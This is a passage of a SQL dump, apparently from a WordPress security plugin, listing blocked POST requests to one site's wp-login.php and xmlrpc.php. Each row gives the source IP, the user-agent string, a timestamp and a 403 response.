(KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','XjcuDHfVmtK57n4i6NhkwBAO',0,1665432873.9302,14654,'','POST',403,0,600,0,1,'',0),('64.227.183.25',1088665369,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','n82VMlP3XQjsAqzJgNZf01Ym',0,1665432450.1109,522,'','POST',403,0,600,0,1,'',0),('69.163.186.158',1168358046,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','eAI3Sp2DiNEhcKRt9a0gBTLr',0,1665438848.3713,18984,'','POST',403,0,600,0,1,'',0),('62.102.148.130',1046910082,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Z7e0YnFCyGAVbmqrNtz4JWgT',0,1665439017.7061,3458,'','POST',403,0,515,0,1,'',0),('147.135.255.8',2475163400,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','fpsHVhoRGv8y0lCQtBDYmgqz',0,1665438420.8681,7669,'','POST',403,0,600,0,1,'',0),('46.63.80.162',775901346,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','9boXlCqSeEjiw2TtfAv8GxpP',0,1665437845.4453,17384,'','POST',403,0,600,0,1,'',0),('91.250.116.80',1543140432,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','5Ias2EgkY984KCA1b0MRLuSx',0,1665437418.7663,18221,'','POST',403,0,600,0,1,'',0),('44.208.152.20',751867924,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','oZMEi8IplJsAWrRu6V7PX39y',0,1665436844.3015,1114,'','POST',403,0,600,0,1,'',0),('213.152.162.15',3583549967,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','cp8xiYLjVZlvwA1PtnS2QURa',0,1665436766.2306,1292,'','POST',403,0,515,0,1,'',0),('184.75.221.43',3091979563,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','C8wgrijxvdNlaALon3UOH0ZW',0,1665436692.2961,2430,'','POST',403,0,515,0,1,'',0),('119.237.81.29',2012041501,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','nbjZSiCUXzw4ovRq5ux90NGl',0,1665436424.3443,17245,'','POST',403,0,600,0,1,'',0),('36.94.142.166',610176678,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','lv5YGknP0gbO8ZU2pSo4uxEV',0,1665435847.4176,1331,'','POST',403,0,600,0,1,'',0),('51.91.151.60',861640508,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','9sfWcNvg70udYBGJyjU5a8ZE',0,1665442412.8803,4012,'','POST',403,0,600,0,1,'',0),('213.152.161.118',3583549814,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','FvALRzi95uCIWadbPoxM2fVh',0,1665440960.7124,2661,'','POST',403,0,515,0,1,'',0),('167.71.63.47',2806464303,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','XkhMbDYca85mNAWHtuBGUFCo',0,1665440835.1003,1667,'','POST',403,0,600,0,1,'',0),('103.166.183.192',1738979264,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','QHfgZcrau6oWGBL9swN4bD50',0,1665440417.2876,1163,'','POST',403,0,600,0,1,'',0),('184.75.223.219',3091980251,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','DEAVzKwQIOyUgR3cYuT2ihXs',0,1665440330.4496,8430,'','POST',403,0,515,0,1,'',0),('167.172.168.111',2813110383,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','BhcpCQxaDmoTenPdsJiLFfjr',0,1665439848.1218,18021,'','POST',403,0,600,0,1,'',0),('185.2.4.33',3103917089,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','NsObhn9DvlgZiXH2CBqyI76t',0,1665439422.5461,17414,'','POST',403,0,600,0,1,'',0),('147.135.255.8',2475163400,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','EdRPrp9mAx2gUD3KwXMj6lYv',0,1665445870.1953,1819,'','POST',403,0,600,0,1,'',0),('165.22.109.42',2769710378,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','GfQebqF7M4AXozsChcIj5T98',0,1665444861.6734,17063,'','POST',403,0,600,0,1,'',0),('46.101.150.34',778409506,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','TlNAKy48OFbwnHqUWvaXGkdm',0,1665444432.9422,1186,'','POST',403,0,600,0,1,'',0),('75.119.135.205',1266124749,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','Wum0tlP4526DNML1cCnRA7wb',0,1665443850.1491,1166,'','POST',403,0,600,0,1,'',0),('185.2.4.56',3103917112,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','eCvnUBx0dLE2r8ORt3SpgKmu',0,1665443419.6836,1320,'','POST',403,0,600,0,1,'',0),('213.152.161.244',3583549940,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','RLSCkDe7Y6BvOtb1hZMT48V9',0,1665443211.4240,18270,'','POST',403,0,515,0,1,'',0),('207.46.234.202',3475958474,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','lVXAqfgjn8WYyB2Pi35ckowv',0,1665442842.3239,2100,'','POST',403,0,600,0,1,'',0),('147.182.249.22',2478242070,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','nh9O8ET6ZP0WwzIcSrDXFtdg',0,1665449940.5307,7420,'','POST',403,0,600,0,1,'',0),('77.65.212.122',1296159866,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','xmeyHWa8uXwfR2P5MCScqF7N',0,1665449510.6332,17372,'','POST',403,0,600,0,1,'',0),('95.217.129.44',1608089900,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','ZOT3KgbzcqGv1eRW95AHMdrj',0,1665448924.3397,17602,'','POST',403,0,600,0,1,'',0),('208.113.153.214',3497105878,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','oIJ7vLZNaOprwXC5FfTGYgB9',0,1665448492.0675,17196,'','POST',403,0,600,0,1,'',0),('68.183.75.82',1152863058,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','c49XzRnu1SpMCshY3otN5wji',0,1665447908.7773,18796,'','POST',403,0,600,0,1,'',0),('77.65.212.122',1296159866,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','HRt0PdXqymY7vnaMwQVANb9I',0,1665447474.8463,1146,'','POST',403,0,600,0,1,'',0),('54.37.156.240',908434672,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','fY4IADvhigaoP2WsxSeHNuGy',0,1665446887.5545,14424,'','POST',403,0,600,0,1,'',0),('159.203.121.12',2680912140,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','4z5qNaYR9UiScGgL60MVKe78',0,1665446453.3326,1292,'','POST',403,0,600,0,1,'',0),('13.78.225.32',223273248,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','gnqokxlI76jb1Ff5yzCLrXwv',0,1665453586.8313,17900,'','POST',403,0,600,0,1,'',0),('143.244.140.199',2415168711,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','kJKVbqAeULm5IPiCZdX2rOR1',0,1665452997.2213,1522,'','POST',403,0,600,0,1,'',0),('139.59.82.122',2335920762,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','FT0tU1BJ6I3SYbAiCp24dyfa',0,1665452566.9918,1494,'','POST',403,0,600,0,1,'',0),('138.68.140.0',2319748096,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','mTtO65hYXiplVQ3BevM91qkJ',0,1665451980.6494,5755,'','POST',403,0,600,0,1,'',0),('64.90.36.102',1079649382,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','brzEAgTdDHX7O1jv2wPxu3Zn',0,1665451546.1940,1713,'','POST',403,0,600,0,1,'',0),('167.172.168.111',2813110383,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','l8HqzpEiVw3GXLjaNDQh4RFI',0,1665450963.0192,19011,'','POST',403,0,600,0,1,'',0),('207.46.234.202',3475958474,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','hQ543GqAsvofKUXnZyrVHMu7',0,1665450528.7825,16348,'','POST',403,0,600,0,1,'',0),('192.71.144.12',3225915404,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','DSMdYiQyVuWoeXrfl23k1n9C',0,1665455038.7382,1792,'','POST',403,0,600,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','bhpKok1xGR2nPt3Hvz0r5qgf',0,1665454688.5193,1308,'','POST',403,0,515,0,1,'',0),('209.141.55.206',3515693006,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','rTldM7BAQpPUeozx924HSaL3',0,1665454652.5933,2408,'','POST',403,0,515,0,1,'',0),('34.75.65.218',575357402,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','0pLHYCkRsAx5KTahnMNZJrvu',0,1665454016.0182,1486,'','POST',403,0,600,0,1,'',0),('1.117.250.215',24509143,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','dWkVFnJBstyTY95PaQNe3LAb',0,1665454605.8568,1136,'','POST',403,0,600,0,1,'',0),('103.74.120.192',1732933824,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XevM57GJVfkmKgcWhHFEpLSw',0,1665460765.5534,18654,'','POST',403,0,515,0,1,'',0),('120.78.15.126',2018381694,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','928Zo74MDPBkyaLN3nVxJEbc',0,1665460210.2195,12144,'','POST',403,0,600,0,1,'',0),('40.70.241.53',675737909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','52YP6Kr1AQxmE9HCpalzWhRb',0,1665459931.9327,10740,'','POST',403,0,515,0,1,'',0),('47.110.72.238',795756782,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1700.107 Safari\\/537.36\"}','I2CB8JkROxd1PuGwWQiKh3jX',0,1665459770.7923,17507,'','POST',403,0,600,0,1,'',0),('199.249.230.7',3355043335,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Ysptzda30PBoON2Lk7QmHWMq',0,1665458994.0564,1215,'','POST',403,0,515,0,1,'',0),('185.200.116.219',3116922075,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','9fveLz48qsVrDMXKmFAJHhWu',0,1665458975.5943,10799,'','POST',403,0,515,0,1,'',0),('13.79.17.158',223285662,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','zoxblgGLa54XUnvA6uhZyqN9',0,1665458743.3683,17773,'','POST',403,0,600,0,1,'',0),('34.68.76.32',574901280,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','UYNKzspe83w5byH0PSFJnqLT',0,1665458139.5185,1518,'','POST',403,0,600,0,1,'',0),('51.178.138.5',867338757,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','m1VSnfNkJqHTD48vjulLPe9t',0,1665457694.5224,1245,'','POST',403,0,600,0,1,'',0),('1.117.250.215',24509143,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','j4sHOLDx5nJ0p6Mg9EXkThrA',0,1665464353.1254,1268,'','POST',403,0,600,0,1,'',0),('143.198.161.19',2412159251,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','37vN4uVgTOMQUW1rHYXsFZbB',0,1665463977.5116,2306,'','POST',403,0,515,0,1,'',0),('46.63.80.162',775901346,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','I5KfoFxS6DP3LGbvehCmytRA',0,1665463916.5493,17661,'','POST',403,0,600,0,1,'',0),('165.232.183.66',2783491906,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hEWxZpqz7tgJGw98RAdml3Xo',0,1665463560.0553,18881,'','POST',403,0,515,0,1,'',0),('54.36.182.160',908375712,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','mpnks8HRtzre6UuBOvCYVXN0',0,1665463327.1114,1540,'','POST',403,0,600,0,1,'',0),('34.64.218.102',574675558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lHsEf3MrRIxDduCaYJF10Z8X',0,1665463128.9323,7731,'','POST',403,0,515,0,1,'',0),('207.154.248.39',3483039783,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','aVUh2QABZIsRPLtg9X4CeMyr',0,1665462883.9466,17852,'','POST',403,0,600,0,1,'',0),('47.74.17.225',793383393,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hvREGcI6aw8QP1HOADydC5L4',0,1665462296.1921,12518,'','POST',403,0,515,0,1,'',0),('144.126.223.177',2424233905,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','aqdlt28FDRfjhTbHp3PwJn0Q',0,1665462289.7990,18174,'','POST',403,0,600,0,1,'',0),('157.245.110.251',2650107643,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','ARja9szqVdEbhpev13FSHP0Z',0,1665461846.1932,17309,'','POST',403,0,600,0,1,'',0),('161.35.68.167',2703443111,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4q0tbClUnDhY5kLXNHz3IKQ8',0,1665461473.3803,18141,'','POST',403,0,515,0,1,'',0),('54.36.182.160',908375712,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','y6n1pxBIikTD2QfKmzJjYqRH',0,1665460810.8158,1914,'','POST',403,0,600,0,1,'',0),('85.91.237.106',1432087914,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','MHyLU2of6Fv1bpIEmxYuWt0d',0,1665461247.9283,18235,'','POST',403,0,600,0,1,'',0),('137.184.117.52',2310567220,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','I6LSzBREgmxh7FcXyrKVOd0s',0,1665467994.1758,1340,'','POST',403,0,600,0,1,'',0),('143.110.137.82',2406386002,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BZSCQFL2TsqI7Ou9n1XJ6wWU',0,1665467782.8156,18599,'','POST',403,0,515,0,1,'',0),('148.72.207.163',2487799715,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','kHxNlB9Pzbsr1GanCYiSOZgj',0,1665467415.1576,1357,'','POST',403,0,600,0,1,'',0),('93.113.111.100',1567715172,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lSvA5aLn4E9dP72yupe6hqgF',0,1665467357.4226,1507,'','POST',403,0,515,0,1,'',0),('161.97.88.147',2707511443,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vKgq4SDciJwGoT87hOHLNUzZ',0,1665467140.7298,18246,'','POST',403,0,515,0,1,'',0),('106.52.120.186',1781823674,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','Qg2Ww8mxAuiBD6ReshUoZTEv',0,1665466986.0990,1239,'','POST',403,0,600,0,1,'',0),('130.61.143.194',2185072578,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ABEWFahYuVciwS52mlvsqtQJ',0,1665466883.5020,1322,'','POST',403,0,515,0,1,'',0),('103.146.202.150',1737673366,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DveUSoN5RCWHFL2yAcr6zm4i',0,1665466652.7013,1259,'','POST',403,0,515,0,1,'',0),('175.178.125.173',2947710381,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','QnWOfmMhe30bpBxNgRAj4ryc',0,1665466397.2791,14159,'','POST',403,0,600,0,1,'',0),('120.79.8.125',2018445437,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4tev5gaWsLpOhzfXBIb9dZ10',0,1665466392.4133,19016,'','POST',403,0,515,0,1,'',0),('104.131.68.19',1753433107,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','nTZCxle8LGYg3uPDvIVbBJaF',0,1665465965.5983,17360,'','POST',403,0,600,0,1,'',0),('50.87.230.228',844621540,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1OMXHUu9ZjIv0ktc8La7rK2N',0,1665465680.9498,2422,'','POST',403,0,515,0,1,'',0),('171.244.21.74',2884900170,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','e3pD1RO0HSk5hf7CvQWqYFwK',0,1665465381.9489,552,'','POST',403,0,515,0,1,'',0),('148.72.207.163',2487799715,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','16Zc3asrSAfluzJt87H4TYK9',0,1665465374.0956,1517,'','POST',403,0,600,0,1,'',0),('72.34.62.119',1210203767,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FICVnrDEb0Z735YQKXdWc6am',0,1665465136.7285,1831,'','POST',403,0,515,0,1,'',0),('35.225.94.95',601972319,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yeUKj3Yg0qXdBczGn8hb7Qmi',0,1665464592.8416,19367,'','POST',403,0,515,0,1,'',0),('104.236.45.171',1760308651,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eOaQ0xwTfk1RtmBG8j6PNudF',0,1665464849.7611,1779,'','POST',403,0,515,0,1,'',0),('64.225.65.31',1088504095,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) 